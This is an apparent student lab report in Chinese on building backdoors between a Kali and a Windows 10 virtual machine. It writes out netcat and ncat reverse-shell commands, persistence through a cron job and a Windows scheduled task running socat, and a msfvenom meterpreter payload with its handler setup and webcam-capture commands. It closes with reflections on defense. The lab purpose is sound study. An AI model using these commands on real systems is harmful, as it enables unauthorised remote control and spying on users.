Kali地址:192.168.153.134
linux
Win10地址:169.254.0.178
web
保证能ping通:
shell
关闭防火墙和杀毒软件vim
ncat.exe -l -p 5237
nc 192.168.153.134 -e /bin/sh
反弹链接Windows主机的 5237 端口windows
攻击成功:Win10成功得到Kali操做shell,可以进行操做
安全
相同道理:在Linux中监听5237端口网络
在Windows输入指令tcp
ncat.exe -e cmd.exe 192.168.153.134 5237
反弹链接Linux的5237端口编辑器
cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程,与windows下的计划任务相似,当安装完成操做系统后,默认会安装此服务 工具,而且会自动启动cron进程,cron进程每分钟会按期检查是否有要执行的任务,若是有要执行的任务,则自动执行该任务。工具
用 crontab -e 指令编辑定时任务,选择3
vim编辑器中用 i 改成插入模式,在最后一行插入 50 19 23 3 * /bin/netcat 192.168.153.134 5237 -e /bin/sh 后输入 :wq! 保存并退出
成功显示ls:
建立新任务,填写任务名称,新建一个触发器。
同时建立新操做,在操做->程序或脚本中选择 socat.exe 文件的路径,在添加参数一栏填写 tcp-listen:5237 exec:cmd.exe,pty,stderr
按快捷键win+L即能锁定计算机,建立的任务开始运行。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=5237 -f exe > 20165237.exe
use exploit/multi/handler /*进入handler模式*/ set payload windows/meterpreter/reverse_tcp /*对应生成的后门程序设置payload*/ show options /*查看当前信息状态*/ set LHOST 192.168.153.134 /*设置LHOST,其中ip为Linux的ip*/ set LPORT 5237 /*设置LPORT*/ exploit /*启动监听*/
webcam_snap / webcam_stream
getuid get system
感想:此次实验,不得不说很让我震惊。这是我第一次实际上get到后门获取信息的知识,很知足。但愿之后可以更深刻的学到相关理论和知识,不只学会攻击,也要学会防范。
例举你能想到的一个后门进入到你系统中的可能方式?
答:
答:在下载软件的时候,可能会有捆绑垃圾下载下来,而后修改开机的启动项,当攻击者输入命令时,本机可能会自动响应。
答:我以为最深入的就是录像和音频的获取(这不就是黑客监视么!!)我已经将笔记本的摄像头贴起来了。
答:360安全卫士或许是个很好的选择;不过若是真正想要发现后门程序,我以为要用抓包技术来分析信息。